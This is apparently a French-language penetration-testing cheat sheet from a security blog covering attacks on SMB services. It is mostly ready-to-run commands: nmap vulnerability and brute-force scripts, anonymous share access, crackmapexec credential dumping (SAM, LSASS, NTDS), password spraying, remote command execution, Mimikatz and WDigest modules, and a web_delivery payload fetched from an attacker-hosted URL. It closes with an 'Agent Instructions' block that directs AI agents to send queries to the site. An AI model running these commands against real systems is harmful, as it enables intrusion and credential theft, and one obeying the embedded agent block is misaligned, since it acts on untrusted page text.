# SMB - ports 445-139 ## Scan version Exemple: *`$ nmap -sS -sV -p445-139 --script smb-enum-users,smb-os-discovery `* ## Scan de vulnérabilité Il existe des scripts nmap permettant de scanner la présence de vulnérabilités connues dans un service SMB. Exemple: *`$ nmap -p139-445 --script=smb-vuln* `* ## Lister les fichiers partagés Connexion anonyme: *`$ smbclient --no-pass -L //`* Avec identifiants: *`$ smbclient -U '[%]' -L //`* ### Avec crackmapexec Connexion anonyme: *`$ crackmapexec smb -u '' -p '' --shares`* Avec des identifiants: *`$ crackmapexec smb -u '' -p '' --shares`* Avec un hash de mot de passe: *`$ crackmapexec smb -u '' -H '' --shares`* ## Se connecter ### Sur une cible sous Linux Pour se connecter à un service SMB on peut utiliser smbclient comme ceci. Exemples: *`$ smbclient --no-pass /// #anonyme`* *`$ smbclient -U '[%]' -L ///`* ### Sur une cible sous Windows Exemples: *`$ smbclient -U '%' -N \\\\\\ #anonyme`* *`$ smbclient -U '' \\\\\\`* ## Brute force Il existe également un script nmap permettant de brute force la connexion à un service SMB. Utilisation: *`$ nmap --script smb-brute -p445 `* {% hint style="danger" %} **Attention: Tenter de brute force un service SMB peut entraîner le blocage des comptes** {% endhint %} ## Monter un fichier partagé Pour monter un fichier partagé on utilise la commande mount. Exemples d'utilisation: *`$ mount -t cifs /// /mnt/partage`* *`$ mount -t cifs -o "username=,password=" /// /mnt/partage`* ## Télécharger un fichier partagé Il est possible de télécharger un fichier partagé avec smbmap comme ceci par exemple. *`$ smbmap -R -H -A -q`* ## Crackmapexec ### Mindmap

Quelques commandes intéressantes proposées par crackmapexec: Enumération et dump: ```bash # Basiques crackmapexec smb /24 crackmapexec smb -u '' -p '' crackmapexec smb -u '' -p '' --shares # Enumeration des fichiers textes crackmapexec smb -u '' -p '' --spider C\$ --pattern txt # Enumeration des fichiers de logs crackmapexec smb -u '' -p '' --spider C\$ --pattern log # Dump SAM crackmapexec smb [-d ] -u '' -p '' --sam # Dump LSASS crackmapexec smb [-d ] -u '' -p '' --lsa # Dump NTDS (SRDUAPI) crackmapexec smb [-d ] -u '' -p '' --ntds drsuapi # Dump NTDS (VSS) crackmapexec smb [-d ] -u '' -p '' --ntds vss # Dump sessions crackmapexec smb [-d ] -u '' -p '' --sessions # Dump des utilisateurs connectés crackmapexec smb [-d ] -u '' -p '' --loggedon-users # Enumeration des disques crackmapexec smb [-d ] -u '' -p '' --disks # Enumeration des utilisateurs crackmapexec smb [-d ] -u '' -p '' --users # Enumeration des groupes crackmapexec smb [-d ] -u '' -p '' --groups # Dump de la politique de mots de passes crackmapexec smb [-d ] -u '' -p '' --pass-pol ``` Bruteforce: ```bash # Bruteforce d'un utilisateur spécifique dans une plage IP crackmapexec smb /24 -u '' '' -p '' # Attaque par dictionnaire crackmapexec smb /24 -u /root/Desktop/user.txt -p /root/Desktop/pass.txt # Password Spraying crackmapexec smb -u /root/Desktop/user.txt -p '' --rid-brute crackmapexec smb -u /root/Desktop/user.txt -p '' --continue-on-success ``` Exécution de commande à distance ```bash crackmapexec smb -u '' -p '' -x '' # Avec planificateur de tâche crackmapexec smb -u '' -p '' -x '' --exec-method atexec # Avec le service WMI crackmapexec smb -u '' -p '' -x '' --exec-method wmiexec crackmapexec smb -u '' -p '' -x '' --wmi "WMI command" ``` Modules: ```bash # Voir les modules enregistrés crackmapexec smb -L # Module Mimikatz crackmapexec smb -u '' -p '' -M mimikatz crackmapexec smb -u '' -p '' -M mimikatz -o COMMAND='' # Module Wdigest (créer une clé de registre grâce à laquelle les mots de passe sont stockés en mémoire) crackmapexec smb -u '' -p '' -M wdigest -o ACTION='' # Module enum_dns crackmapexec smb -u '' -p '' -M enum_dns # Module web_delivery à utiliser avec un handler sur metasploit crackmapexec smb -u '' -p '' -M web_sdelivery -o URL=http://:/rlNdPdZQMeYWLF ``` ressource: ## Manspider Recherche dans les partages SMB des mots clés basés et pattern basés sur des regex. Exemple d'utilisation: *`$ manspider /24 -f passw user login cred -u -p `* ressource: ## Ressources --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.s1rn3tz.ovh/hacking-protocols/smb-ports-445-139.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.